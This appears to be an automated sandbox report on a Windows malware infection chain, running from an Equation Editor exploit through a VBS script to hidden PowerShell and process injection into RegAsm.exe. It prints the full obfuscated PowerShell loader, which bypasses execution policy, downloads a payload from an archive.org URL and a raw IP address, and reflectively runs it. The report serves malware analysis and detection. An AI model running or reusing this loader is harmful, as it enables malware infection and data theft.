                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7E2 Sleep,ExitProcess,9_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 588Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1283Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1417Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5199Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 415Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9561Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_9-54170
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3376Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep count: 1417 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep count: 5199 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -4200000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808Thread sleep count: 415 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808Thread sleep time: -1245000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3908Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808Thread sleep count: 9561 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808Thread sleep time: -28683000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4032Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4084Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]9_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10004AB4 mov eax, dword ptr fs:[00000030h]9_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,9_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434BD8 SetUnhandledExceptionFilter,9_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Contains functionality to inject code into remote processes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,9_2_0041812A
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419662 mouse_event,9_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"Jump to behavior
